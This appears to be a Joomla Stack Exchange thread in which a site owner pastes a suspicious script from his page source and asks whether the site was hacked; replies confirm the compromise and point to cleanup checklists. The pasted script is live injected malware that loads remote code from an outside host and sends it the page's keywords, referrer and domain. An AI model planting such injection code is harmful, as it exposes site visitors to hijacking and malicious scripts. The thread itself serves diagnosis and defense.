# Scary Code on Joomla Site

Tags: hack

When the website is opened, I notice a message on the lower left hand side of the page with an unfamiliar address. Examining the source code I see the following:

`<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://www.blackdragon.fr/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://www.blackdragon.fr/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>`

Have I been hacked? Advice would be appreciated. -Carter

Comment: Update Joomla. Update all extensions. Update all passwords (cpanel, ftp, admin etc). Try to find the source of the issue.

Comment: Also, whose in charge of the server?  Is this is a vm or actual box you manage can log into?  If your folder/file  permissions are not strict enough, imnediately check the PHP template files in question to ensure code was not inserted. iIt's possible your server has been compromised.

Comment: Joomla and all extensions are up to date. The site is on rackspace. I agree and I'm looking for the source of the problem.

Answer (score 1):

Yes, your site has been compromised.

Please, review the following checklist:

**Security Checklist/You have been hacked or defaced**
https://docs.joomla.org/Security_Checklist/You_have_been_hacked_or_defaced

More info: [What to do if my Joomla website got hacked?](https://joomla.stackexchange.com/questions/2305/what-to-do-if-my-joomla-website-got-hacked/2316)